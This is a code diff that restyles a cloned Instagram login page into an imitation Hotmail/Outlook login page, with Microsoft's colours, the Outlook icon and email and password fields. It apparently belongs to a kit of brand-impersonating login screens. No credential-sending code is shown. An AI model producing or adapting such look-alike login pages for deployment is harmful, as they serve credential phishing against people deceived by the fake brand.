--- a/hotmail.html
+++ b/hotmail.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Instagram Login</title>
+    <title>Hotmail Login</title>
     <style>
         /* Reset styles */
         * {
@@ -19,48 +19,72 @@
             align-items: center;
             justify-content: center;
             height: 100vh;
-            background-color: #fafafa;
+            background-color: #f3f2f1;
         }
 
         .login-container {
             width: 350px;
-            padding: 20px;
-            background-color: #fff;
-            border: 1px solid #dbdbdb;
+            padding: 25px;
+            background-color: #ffffff;
+            border: 1px solid #d6d6d6;
             border-radius: 5px;
             text-align: center;
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
         }
 
-        /* Instagram logo styling */
+        /* Hotmail logo styling */
         .logo {
             margin: 20px 0;
+            display: flex;
+            align-items: center;
+            justify-content: center;
+        }
+
+        .logo img {
+            width: 30px;
+            height: 30px;
+            margin-right: 10px;
+        }
+
+        .logo-text {
             font-size: 24px;
             font-weight: bold;
-            color: #262626;
+            color: #0078d4;
         }
 
         /* Input field styles */
         .input-field {
             width: 100%;
-            padding: 10px;
-            margin: 10px 0;
-            border: 1px solid #dbdbdb;
+            padding: 12px;
+            margin: 12px 0;
+            border: 1px solid #d6d6d6;
             border-radius: 3px;
-            background-color: #fafafa;
+            background-color: #f9f9f9;
             font-size: 14px;
+        }
+
+        .input-field:focus {
+            border-color: #0078d4;
+            outline: none;
         }
 
         /* Login button styling */
         .login-button {
             width: 100%;
-            padding: 10px;
+            padding: 12px;
             margin: 20px 0;
-            background-color: #3897f0;
-            color: #fff;
+            background-color: #0078d4;
+            color: #ffffff;
             border: none;
             border-radius: 3px;
             font-weight: bold;
+            font-size: 14px;
             cursor: pointer;
+            transition: background-color 0.3s;
+        }
+
+        .login-button:hover {
+            background-color: #005ea6;
         }
 
         /* Error message styling */
@@ -73,13 +97,13 @@
 
         /* Additional text */
         .text-muted {
-            color: #8e8e8e;
+            color: #767676;
             font-size: 12px;
         }
 
         /* Sign up link */
         .signup-link {
-            color: #3897f0;
+            color: #0078d4;
             text-decoration: none;
             font-weight: bold;
         }
@@ -91,9 +115,12 @@
 </head>
 <body>
     <div class="login-container">
-        <div class="logo">Instagram</div>
+        <div class="logo">
+            <img src="https://upload.wikimedia.org/wikipedia/commons/3/3c/Outlook.com_icon.png" alt="Hotmail Logo">
+            <div class="logo-text">Hotmail</div>
+        </div>
         <form id="loginForm">
-            <input type="text" class="input-field" id="username" placeholder="Username" required>
+            <input type="text" class="input-field" id="username" placeholder="Email address" required>
             <input type="password" class="input-field" id="password" placeholder="Password" required>
             <button type="submit" class="login-button">Log In</button>
         </form>
